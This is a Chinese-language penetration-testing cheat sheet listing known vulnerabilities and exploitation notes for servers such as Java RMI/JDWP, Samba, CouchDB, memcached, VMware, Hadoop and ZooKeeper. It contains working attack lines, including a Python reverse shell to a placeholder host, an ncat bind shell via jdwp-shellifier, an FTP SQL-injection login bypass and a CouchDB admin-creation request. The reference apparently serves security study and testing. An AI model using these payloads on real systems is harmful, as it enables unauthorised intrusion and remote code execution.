C/S - Exploits

---

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.

---

大纲

• 运维

  • Jmeter

• 编程语言

  • Java
  • Python
  • Ruby

• 远程服务

  • Aria2

• 文件服务

  • FTP
  • NFS
  • Rsync
  • Samba

• 数据库

  • CouchDB
  • InfluxDB
  • memcached
  • MSSQL
  • MongoDB
  • Mysql
  • oracle
  • OrientDB
  • PostgreSQL
  • Redis

• 容器 & 虚拟化

  • Citrix
    • Citrix Receiver
    • XenMobile
  • Docker
    • 由系统漏洞引起
    • 由配置不当引起
    • 容器服务缺陷引起
  • Kubernetes
  • VMware
    • VMware vCenter
    • VMWare ESXi
    • VMware View Planner
    • VMware vRealize Operations Manager
    • VMware Workspace ONE Access

• 分布式

  • Hadoop
  • Spark
  • ZooKeeper

• 组态软件

  • WebAccess

---

资源

• theLSA/CS-checklist

---

运维

Jmeter

fofa : title=="Apache JMeter Dashboard"

Apache JMeter 是美国阿帕奇(Apache)软件基金会的一套使用 Java 语言编写的用于压力测试和性能测试的开源软件。

CVE-2018-1297 Jmeter RMI 反序列化命令执行漏洞

• 描述

  Apache JMeter 2.x 版本和 3.x 版本中存在安全漏洞。攻击者可利用该漏洞获取 JMeterEngine 的访问权限并发送未授权的代码。

• POC | Payload | exp

  • https://vulhub.org/#/environments/jmeter/CVE-2018-1297/

---

编程语言

Java

RMI

Fofa: app="Oracle-JAVA-RMI"

fofa: protocol="java-rmi"

描述

Java RMI, 即 远程方法调用(Remote Method Invocation), 一种用于实现远程过程调用(RPC)(Remote procedure call)的 Java API, 能直接传输序列化后的 Java 对象和分布式垃圾收集

通常开放在 1090 1099 等端口, 由于直接传输 java 对象, 可能存在远程代码执行.

指纹

• rmiregistry

相关文章

• Java RMI 反序列化漏洞检测工具的编写
• JAVA反序列化之 Rmi命令执行漏洞分析
• JAVA RMI 反序列化远程命令执行漏洞

相关工具

• frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
• A-D-Team/attackRmi

jdwp

描述

JDWP 是 Java Debug Wire Protocol 的缩写，在 JPDA(Java Platform Debugger Architecture)中，它定义了调试器(debugger)和被调试的 Java 虚拟机(target vm)之间的通信协议。

与 PHP 的 Xdebug 类似，当其调试端口直接开放在公网上时，很容易被攻击者攻击并且获取系统权限。

指纹

• JDWP-Handshake

  telnet 端口后，输入命令 JDWP-Handshake
  如果返回 JDWP-Handshake，证明存在漏洞。

  jdb -attach IP:PORT

相关文章

• JDWP无依赖攻击
• 浅析常见Debug调试器的安全隐患
• jdwp远程调试与安全
• jdwp命令执行
• 某大厂红队评估_之_JDWP打点

相关工具

• IOActive/jdwp-shellifier

  jdwp-shellifier.py -t xx.xx.xx.xx -p 8080 --break-on java.lang.String.indexOf --cmd 'touch /tmp/pwnd'jdwp-shellifier.py -t xx.xx.xx.xx -p 8080 --break-on java.lang.String.indexOf --cmd 'rm -f /var/run/yum.pid'
  jdwp-shellifier.py -t xx.xx.xx.xx -p 8080 --break-on java.lang.String.indexOf --cmd 'yum install -y nc'
  jdwp-shellifier.py -t xx.xx.xx.xx -p 8080 --break-on java.lang.String.indexOf --cmd 'ncat -v -l -p 7777 -e /bin/bash'jdwp-shellifier.py -t xx.xx.xx.xx -p 8000 --break-on java.lang.String.indexOf --cmd "bash -c {echo,  bash64的payload  } | {base64,-d} | {bash,-i}"

• Lz1y/jdwp-shellifier - 修改利用方式为通过对 Sleeping 的线程发送单步执行事件，达成断点，从而可以直接获取上下文、执行命令，而不用等待断点被击中。

jmx

相关文章

• 梦游一次从jmx到rce

---

Python

Python_PDB

• 相关文章

  • 浅析常见Debug调试器的安全隐患
  • Python调试之RPDB工具

• POC | Payload | exp

  telnet xxx.xxx.xxx.xxx 4444
  1
  w
  !1+1
  !import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xxx.xxx.xxx.xxx",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Python PIL 远程命令执行漏洞(GhostButt)

• 描述

  Python 中处理图片的模块 PIL(Pillow)，因为其内部调用了 GhostScript 而受到 GhostButt 漏洞(CVE-2017-8291)的影响，造成远程命令执行漏洞。

• 相关文章

  • Exploiting Python PIL Module Command Execution Vulnerability
  • GhostButt - CVE-2017-8291利用分析

• POC | Payload | exp

  • Python PIL 远程命令执行漏洞(GhostButt) - (未复现成功)
  • vulhub/python/PIL-CVE-2017-8291/poc.png

Python PIL/Pillow Remote Shell Command Execution via Ghostscript CVE-2018-16509

• 描述

  Google Project Zero 的 Tavis Ormandy 在 Ghostscript 中发现了一堆漏洞,其中一个是 CVE-2018-16509，这个漏洞允许利用 v9.24 之前的 Ghostscript 中的 -dSAFER 旁路，通过处理 PostScript 中失败的还原(grestore)来禁用 LockSafetyParams 并避免无效访问，从而执行任意命令。此漏洞可通过库，如 ImageMagick 或带有 Ghotscript 包装器的编程语言中的图像库(本例中的 PIL/Pillow)实现。

• POC | Payload | exp

  • Python PIL/Pillow Remote Shell Command Execution via Ghostscript CVE-2018-16509 - (未复现成功)

Python unpickle 造成任意命令执行漏洞

• 相关文章

  • Django 远程命令执行漏洞详解
  • 掌阅iReader某站Python漏洞挖掘

• POC | Payload | exp

  • Python unpickle 造成任意命令执行漏洞

---

ruby

fofa : app="Ruby"

ruby-debug-ide

• 相关文章
  • 浅析常见Debug调试器的安全隐患

---

远程服务

Aria2

项目地址 : https://github.com/aria2/aria2

fofa : "Aria2"

Aria2 任意文件写入漏洞

• 描述

  Aria2 是一个命令行下轻量级、多协议、多来源的下载工具 (支持 HTTP/HTTPS、FTP、BitTorrent、Metalink) ,内建 XML-RPC 和 JSON-RPC 接口.在有权限的情况下,我们可以使用 RPC 接口来操作 aria2 来下载文件,将文件下载至任意目录,造成一个任意文件写入漏洞.

• 相关文章

  • Aria2 任意文件写入漏洞

---

clash_for_windows

rce

• https://github.com/Fndroid/clash_for_windows_pkg/issues/2710

向日葵

向日葵 rce

• POC | Payload | exp
  • Mr-xn/sunlogin_rce

CNVD-2022-10270 本地权限提升

• POC | Payload | exp
  • Ryze-T/CNVD-2022-10270-LPE

---

文件服务

FTP

相关文章

• 云服务器ftp被动和主动模式都连接失败

Xlight FTP Server < 3.2.1 user 参数 SQL 注入漏洞

• 描述

  在执行 ODBC 认证过程中 Xlight FTP Server 没有正确地过滤用户所提交的用户名和口令字段,远程攻击者可以用"OR ‘1’=’1’ ;#"替换用户名绕过认证登录到服务器.

• POC | Payload | exp

  220 Xlight FTP Server 3.2 ready...
  User (server-4:(none)) : \' OR \'1\'=\'1\' ;#
  331 Password required for \' OR \'1\'=\'1\' ;#
  Password : type anything
  230 Login OK
  ftp>

Serv-U FTP Server 目录遍历漏洞

• 相关文章

  • Serv-U FTP Server 0day漏洞分析报告

• POC | Payload | exp

  ls ../windwos550 .....ls ..:/windows150 ..........

NFS

fofa : protocol="nfs"

相关文章

• 针对NFS的渗透测试

CVE-1999-0554 目标主机 showmount -e 信息泄露

• POC | Payload | exp

  showmount -e <目标ip>
  mount -t nfs <目标ip>:/opt/applications/xxx_static_data  /mnt

• MSF 模块

  use auxiliary/scanner/nfs/nfsmount
  set rhosts <目标ip>
  run

---

Rsync

fofa : app="rsync"

未授权访问

• 相关文章

  • rsync的几则tips(渗透技巧)
  • 配置漏洞之Rsync匿名访问

• POC | Payload | exp

  apt install rsync -y
  rsync <目标IP>::

  • rsync 未授权访问漏洞

• MSF 模块

  use auxiliary/scanner/rsync/modules_list
  set rhosts <目标ip>
  run

---

Samba

Samba 是 Samba 团队开发的一套可使 UNIX 系列的操作系统与微软 Windows 操作系统的 SMB/CIFS 网络协议做连结的自由软件，它支持共享打印机、互相传输资料文件等。

CVE-2015-0240

• 描述

  Samba 的 smbd 文件服务器守护进程中的 Netlogon 服务器实现过程中存在安全漏洞，该漏洞源于程序对未初始化的栈指针执行释放操作。远程攻击者可借助特制的 Netlogon 数据包利用该漏洞执行任意代码。以下版本受到影响：Samba 3.5.x 版本和 3.6.25 之前的 3.6.x 版本，4.0.25 之前的 4.0.x 版本，4.1.17 之前的 4.1.x 版本，4.2.0rc5 之前的 4.2.x 版本。

• 相关文章

  • Samba CVE-2015-0240 远程代码执行漏洞利用实践

• MSF 模块

  use auxiliary/scanner/smb/smb_uninit_cred
  set rhosts [ip]
  run

CVE-2017-7494

• 描述

  Samba 允许连接一个远程的命名管道,并且在连接前会调用 is_known_pipename() 函数验证管道名称是否合法.在 is_known_pipename() 函数中,并没有检查管道名称中的特殊字符,加载了使用该名称的动态链接库.导致攻击者可以构造一个恶意的动态链接库文件,执行任意代码.

  该漏洞要求的利用条件:

  • 拥有共享文件写入权限,如:匿名可写等
  • 需要知道共享目录的物理路径

• 影响版本

  • Samba:4.6.5:::
  • Samba:4.6.3:::
  • Samba:4.6.2:::
  • Samba:4.6.1:::
  • Samba:4.6.0:::

• 相关文章

  • Linux cve-2017-7494samba远程漏洞利用和分析
  • Samba 远程命令执行漏洞(CVE-2017-7494)

• POC | Payload | exp

  • joxeankoret/CVE-2017-7494
  • opsxcq/exploit-CVE-2017-7494

• MSF 模块

  use exploit/linux/samba/is_known_pipename
  set rhost [ip]
  set target 3
  run

---

数据库

相关文章

• 数据库利用 看这篇就好了

相关工具

• SafeGroceryStore/MDUT - 数据库跨平台利用工具
  • https://www.yuque.com/u21224612/nezuig/ays2ai
• Ryze-T/Sylas - 数据库综合利用工具
  • https://paper.seebug.org/1836/

CouchDB

Apache CouchDB 是一个开源数据库，专注于易用性和成为"完全拥抱 web 的数据库"。它是一个使用JSON作为存储格式，JavaScript 作为查询语言，MapReduce 和 HTTP 作为 API 的 NoSQL 数据库。应用广泛，如 BBC 用在其动态内容展示平台，Credit Suisse 用在其内部的商品部门的市场框架，Meebo，用在其社交平台(web 和应用程序).

shodan : "product:CouchDB"
fofa ： app="APACHE-CouchDB"

未授权访问漏洞

• 描述

  默认会在 5984 端口开放 Restful 的 API 接口，如果使用 SSL 的话就会监听在 6984 端口，用于数据库的管理功能。其 HTTP Server 默认开启时没有进行验证，而且绑定在 0.0.0.0，所有用户均可通过 API 访问导致未授权访问。

  在官方配置文档中对 HTTP Server 的配置有 WWW-Authenticate：Set this option to trigger basic-auth popup on unauthorized requests，但是很多用户都没有这么配置，导致漏洞产生。

• 利用

  http://[ip]:5984/_utils/

  curl http://[ip]:5984

  curl http://[ip]:5984/_config

CVE-2017-12635 垂直权限绕过漏洞

• 描述

  CVE-2017-12635 是由于 Erlang 和 JavaScript 对 JSON 解析方式的不同，导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员，属于垂直权限绕过漏洞。

• 影响版本

  • 小于 1.7.0 以及 小于 2.1.1

• POC | Payload | exp

  来源 : Couchdb 垂直权限绕过漏洞(CVE-2017-12635)

  PUT /_users/org.couchdb.user:vulhub HTTP/1.1
  Host: your-ip:5984
  Accept: */*
  Accept-Language: en
  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
  Connection: close
  Content-Type: application/json
  Content-Length: 108{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "roles": [],
  "password": "vulhub"
  }

CVE-2017-12636 任意命令执行漏洞

• 描述

  CVE-2017-12636 是一个任意命令执行漏洞，我们可以通过 config api 修改 couchdb 的配置 query_server，这个配置项在设计、执行 view 的时候将被运行。

• 影响版本

  • 小于 1.7.0 以及 小于 2.1.1

• POC | Payload | exp

  • Couchdb 任意命令执行漏洞(CVE-2017-12636)

InfluxDB

InfluxDB 是一个使用 Go 语言编写的开源分布式，支持高并发的时序数据库

fofa : app="influxdata-InfluxDB"
fofa : app="InfluxDB-2.0"

未授权访问漏洞

• 相关文章

  • InfluxDB API 未授权访问漏洞简单利用
  • influxdb未授权访问漏洞

• POC | Payload | exp

  /debug/vars
  /debug/requests?seconds=10
  /ping 用来检查数据库实例状态和版本号
  /query 用来查询数据库数据
  /write 用来更改数据库数据

---

memcached

Memcached 是一套常用的 key-value 分布式高速缓存系统

shodan: "product:Memcached"
fofa: app="MEMCACHED"

相关文章

• 针对Memcached缓存服务器的渗透测试方法介绍

未授权访问漏洞

• 描述

  由于 Memcached 的安全设计缺陷没有权限控制模块，所以对公网开放的 Memcache 服务很容易被攻击者扫描发现，攻击者无需认证通过命令交互可直接读取 Memcached 中的敏感信息。

• POC | Payload | exp

  telnet [ip] 11211

  nc -vv [ip] 11211

  version         # 检查 Memcached Server 的当前版本
  stats           # 查看 memcache 服务状态
  stats slabs     # 获取 slab 统计信息
  stats items     # 显示各个 slab 中 item 的数目和存储时长
  set aaa 0 10 9  # 存个 aaa 值
  # flag → 0  (可以包括键值对的整型参数，客户机使用它存储关于键值对的额外信息)
  # exptime → 10 (以秒为单位)
  # bytes → 9 (数据存储的字节数)memcachedget aaa         # 读这个值

• MSF 模块

  use auxiliary/gather/memcached_extractor

CVE-2016-8704 & CVE-2016-8705 & CVE-2016-8706

• 描述

  Memcached 是一个分布式的高速缓存系统，近日研究者发现在其 < 1.4.33 的版本中存在三个整数溢出漏洞(http://blog.talosintel.com/2016/10/memcached-vulnerabilities.html)，通过这几个漏洞攻击者可以触发堆溢出进而远程执行任意命令。官方在 11 月 1 日发布了升级公告。

• 相关文章

  • Memcached 命令执行漏洞(CVE-2016-8704、CVE-2016-8705、CVE-2016-8706)简析

---

MSSQL

• MSSQL

---

MongoDB

fofa: app="MongoDB-数据库"

未授权访问

nmap -p 27017 --script mongodb-info x.x.x.x

---

Mysql

• Mysql

---

Oracle

• Oracle

---

OrientDB

OrientDB 是英国 Orient 公司一套开源的 NoSQL 数据库管理系统。该系统支持 ACID 事务、快速索引和 SQL 查询等功能。

fofa : app="OrientDB"

CVE-2017-11467

• 描述

  OrientDB 2.22 及之前的版本中存在安全漏洞，该漏洞源于程序没有强制执行权限请求。远程攻击者可通过发送特制的请求利用该漏洞执行任意的操作系统命令。

• 相关文章

  • OrientDB远程代码执行漏洞POC分析以及复现|CVE-2017-11467

• POC | Payload | exp

  • OrientDB - Code Execution

---

PostgreSQL

• PostgreSQL

---

Redis

• Redis

---

容器 & 虚拟化

相关文章

• 云原生服务风险测绘分析(一)：Docker和Kubernetes
• An attempt to understand container runtime

相关工具

• cdk-team/CDK - 为容器环境定制的渗透测试工具，在已攻陷的容器内部提供零依赖的常用命令及 PoC/EXP。集成 Docker/K8s 场景特有的 逃逸、横向移动、持久化利用方式，插件化管理。
• stealthcopter/deepce - Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE)

开源靶场/部署工具

• Metarget/metarget - Metarget is a framework providing automatic constructions of vulnerable infrastructures.

  git clone https://github.com/brant-ruan/metarget.git
  cd metarget/ && pip3 install -r requirements.txt
  ./metarget cnv list
  ./metarget appv list

检测虚拟机

• windows

  cmd : systeminfo

  Powershell : get-wmiobject win32_computersystem | fl model

• linux

  cat /proc/1/cgroup
  lshw -class system | grep -i VM & grep -i virtual
  dmesg | grep -i VM & grep -i virtual
  dmidecode -s system-product-name
  ls /tmp
  systemd-detect-virt
  virt-what
  ls -alh /.dockerenv

Citrix

相关文章

• 浅谈关于企业中citrix的渗透思路

Citrix Receiver

shodan : title:"citrix gateway"

fofa : Citrix_Receiver

注意一下 1494 和 2598 端口

默认账号

nsroot/nsroot
citrix/citrix

相关文章

• CitrixReceiver平台的一次渗透测试
• 利用Citrix Receiver浏览器进行渗透

XenMobile

fofa: app="XenMobile-Console"

CVE-2020-8209 - Path Traversal

• 相关文章
  • Path Traversal on Citrix XenMobile Server

---

Docker

• Docker

---

Kubernetes

• Kubernetes

---

VMware

VMware vSphere，ESXi 和 vCenter 的区别

出自 : https://blog.csdn.net/lm3758/article/details/88996556

VMware Inc. 是一家软件公司。它开发了许多产品，尤其是各种云解决方案 。他的云解决方案包括云产品，数据中心产品和桌面产品等。

vSphere 是在数据中心产品下的一套软件。vSphere 类似微软的 Office 办公套件，Office 办公套件包含了许多软件如 Word, Excel, Access 等。和 Office 一样，vSphere 也是一个软件的集合。他包括了 vCenter, ESXi 和 vSphere Client 等。所以，这些软件联合起来就是 vSphere。vSphere 不是一个可以安装使用的软件, 它是一个包含其它组件的集合。ESXi, vSphere client 和 vCeneter 都是 vSphere 的组件。

ESXi 是 vSphere 中最重要的一个组件。ESXi 是从服务器底层来进行虚拟化，它对外提供一个虚拟化服务，所有的虚拟机都运行在 ESXi 服务上面。为了安装，管理和访问这些虚拟机，你需要另外的一个 vSphere 组件，它就是 vSphere client 或 vCenter。

vSphere client 允许管理员通过该软件访问 ESXi 服务并管理虚拟机。vSphere client 安装在客户机上面。vSphere client 被用来连接 ESXi 服务器和管理任务。

vCenter server 它和 vSphere client 很像，但是它和功能更加强大。vCenter server 是安装在 Window 服务器或 Linux 服务器里面。 vCenter server 是一个中心化的管理应用。你可以通过它管理所有的虚拟机和 ESXi 物理机。vSphere client 可以通过访问 vCenter Server 来管理 EXSi 服务器。vCenter server 是一个企业级的产品，有许多企业级的功能，像 vMotion, VMware High Availability, VMware Update Manager 和 VMware Distributed Resource Scheduler(DRS)。你可以方便的通过 vCenter server 克隆存在的虚拟机。

总结 vSphere 是一个产品套件，ESXi 是安装在物理机上面的服务。vSphere Client 安装在客户端的笔记本或 PC 机上面，用来访问 ESXi 服务并安装和管理上面的虚拟机。vCenter Server 安装在了 ESXi 服务器的虚拟机里面。vCenter 也可以安装在单独的物理服务器上面，但是虚拟化不应该更好么? vCenter 服务通常用在有很多 EXSi 服务和许多虚拟机的大规模环境中。vCenter 也可以使用 vSphere client 来管理。所以 vSphere client 可以在小环境中直接管理 ESXi 服务。也可以在大规模的环境中，通过 vCenter 服务间接管理 ESXi 服务。

VMware vCenter

• vCenter

VMWare ESXi

相关文章

• 【技术原创】渗透技巧——从VMware ESXI横向移动到Windows虚拟机

CVE-2021-21974

• 影响版本

  • vmware:esxi:6.5:2::::::
  • vmware:esxi:6.5:650 - 6.7:670

• POC | Payload | exp

  • Shadow0ps/CVE-2021-21974

VMware View Planner

CVE-2021-21978 VMware View Planner 远程代码执行漏洞

• 相关文章
  • VMware View Planner 远程代码执行漏洞 CVE-2021-21978
  • CVE-2021-21978：VM View Planner RCE分析复现

VMware vRealize Operations Manager

CVE-2021-21975 SSRF

• POC | Payload | exp

  POST /casa/nodes/thumbprints HTTP/1.1
  Content-Type: application/json;charset=UTF-8["127.0.0.1:443/ui"]

CVE-2021-21983

• POC | Payload | exp
  • rabidwh0re/REALITY_SMASHER

VMware Workspace ONE Access

CVE-2020-4006 VMware Workspace ONE Access 命令注入漏洞

• 描述

  2020 年 11 月 23 日，VMware 发布安全公告，其多个产品和组件的管理配置器中存在一个命令注入漏洞(CVE-2020-4006)，其 CVSS 评分 9.1。具有管理配置器 8443 端口的网络访问权限并拥有管理配置器 admin 帐户和密码的攻击者可以利用此漏洞在系统上执行命令。

  漏洞位于 /cfg/ssl/installSelfSignedCertificate TLS 端口 8443 上的 “Appliance Configurator” 服务中的端点中，通过 san 参数在 POST 对端点的请求中指定恶意参数，可以执行任意 shell 命令。请注意该服务可能会重新启动。动作会记录在 /opt/vmware/horizon/workspace/logs/configurator.log 文件中。

• POC | Payload | exp

  • https://attackerkb.com/topics/2DKGb1v8mA/cve-2020-4006
  • https://twitter.com/wvuuuuuuuuuuuuu/status/1391887171649515529

CVE-2021-22056 ssrf

• 相关文章
  • Stealing administrative JWT's through post auth SSRF (CVE-2021-22056)

CVE-2022-22972

• POC | Payload | exp
  • horizon3ai/CVE-2022-22972

---

分布式

Hadoop

Hadoop 是一个由 Apache 基金会所开发的分布式系统基础架构。用户可以在不了解分布式底层细节的情况下，开发分布式程序。充分利用集群的威力进行高速运算和存储。

fofa : app="APACHE-hadoop-HttpFS"
fofa : app="APACHE-hadoop-ResourceManager"
fofa : app="APACHE-hadoop-YARN"

相关文章

• Hadoop渗透及安全加固
• 挖掘分布式系统——Hadoop的漏洞

未授权访问漏洞

• 描述

  由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口，黑客可以通过命令行操作多个目录下的数据，如进行删除，下载，目录浏览甚至命令执行等操作，产生极大的危害。

• 示例

  http://[ip]:8088/
  http://[ip]:50070
  http://[ip]:50070/dfshealth.jsp
  http://[ip]:50070/logs/

• POC | Payload | exp

  • https://github.com/vulhub/vulhub/blob/master/hadoop/unauthorized-yarn/exploit.py

Hadoop Yarn RPC RCE

• 描述

  Hadoop Yarn RPC 未授权访问漏洞存在于 Hadoop Yarn 中负责资源管理和任务调度的 ResourceManager，成因是该组件为用户提供的 RPC 服务默认情况下无需认证即可访问。Hadoop Yarn RPC 未授权访问使得攻击者无需认证即可通过 RPC 通信执行恶意命令。

• 相关文章

  • Hadoop Yarn RPC未授权RCE
  • Hadoop Yarn RPC RCE 复现

• POC | Payload | exp

  • cckuailong/YarnRpcRCE

    java -jar YarnRpcUnauth.jar ip:port "touch /tmp/success"

---

Spark

Apache Spark 是一款集群计算系统,其支持用户向管理节点提交应用,并分发给集群执行.

官网 : https://spark.apache.org/

fofa : app="APACHE-Spark"

未授权访问漏洞

• 描述

  Apache Spark是一款集群计算系统，其支持用户向管理节点提交应用，并分发给集群执行。如果管理节点未启动ACL(访问控制)，我们将可以在集群中执行任意代码。

• 相关文章

  • Apache Spark 未授权访问漏洞
  • 某大厂红队评估_之_Apache Spark打点

• POC | Payload | exp

  • aRe00t/rce-over-spark

SPARK-38631

• 描述

  当文件名称被恶意用户控制时，存在通过Utils.unpack实现任意shell命令注入的风险.

• 影响范围

  • 3.1.2
  • 3.2.1
  • 3.3.0

• 相关文章

  • SPARK-38631 Hadoop unTar函数引发的命令注入漏洞

---

ZooKeeper

Apache Zookeeper 是美国阿帕奇(Apache)软件基金会的一个软件项目，它能够为大型分布式计算提供开源的分布式配置服务、同步服务和命名注册等功能。

fofa : app="APACHE-ZooKeeper"

未授权访问漏洞

• 描述

  Zookeeper 的默认开放端口是 2181。Zookeeper 安装部署之后默认情况下不需要任何身份验证，造成攻击者可以远程利用 Zookeeper，通过服务器收集敏感信息或者在 Zookeeper 集群内进行破坏(比如：kill 命令)。攻击者能够执行所有只允许由管理员运行的命令。

• 相关文章

  • ZooKeeper 未授权访问漏洞
  • 攻击大数据应用:ZooKeeper

• 搭建环境

  wget https://mirrors.tuna.tsinghua.edu.cn/apache/zookeeper/zookeeper-3.4.14/zookeeper-3.4.14.tar.gz
  tar -xzvf zookeeper-3.4.14.tar.gz
  cd zookeeper-3.4.14/conf
  mv zoo_sample.cfg zoo.cfg
  ../bin/zkServer.sh start
  ../bin/zkCli.sh -server 127.0.0.1:2181  # 连接 server

• 利用

  echo envi|nc [ip] 2181      # 打印有关服务环境的详细信息
  echo dump |ncat [ip] 2181   # 列出未完成的会话和临时节点
  echo reqs |ncat [ip] 2181   # 列出未完成的请求
  echo ruok |ncat [ip] 2181   # 测试服务器是否运行在非错误状态
  echo stat |ncat [ip] 2181   # 列出关于性能和连接的客户端的统计信息./zkCli.sh -server [ip]:port

CVE-2014-0085 ZooKeeper 信息泄露漏洞

• 描述

  Apache Zookeeper 中存在安全漏洞，该漏洞源于程序记录明文 admin 密码。本地攻击者可通过读取日志利用该漏洞获取敏感信息。

• 相关文章

  • ZooKeeper信息泄露漏洞(CVE-2014-085)

---

组态软件

WebAccess

研华 WebAccess 软件是研华物联网应用平台解决方案的核心，为用户提供一个基于 HTML5 技术用户界面，实现跨平台、跨浏览器的数据访问体验。使用 WebAccess 后，用户可以建立一个信息管理平台，同步提高垂直市场管理发展的效率。

fofa : app="ADVANTECH-WebAccess"

CVE-2017-16720 Advantech WebAccess远程命令执行

• 描述

  此漏洞允许攻击者使用 RPC 协议通过 TCP 端口 4592 执行远程命令。

  通过利用恶意分布式计算环境/远程过程调用(DCERPC)，webvrpcs.exe 服务将命令行指令传递给主机， webvrpcs.exe 服务以管理员访问权限运行。版本小于 8.3、8.3.1、8.3.2 仍然存在特定的安全漏洞。

• 相关文章

  • 漏洞实验：CVE-2017-16720 Advantech WebAccess远程命令执行

• POC | Payload | exp

  • Advantech WebAccess < 8.3 - Directory Traversal / Remote Code Execution

点击关注，共同学习！安全狗的自我修养

github haidragon

https://github.com/haidragon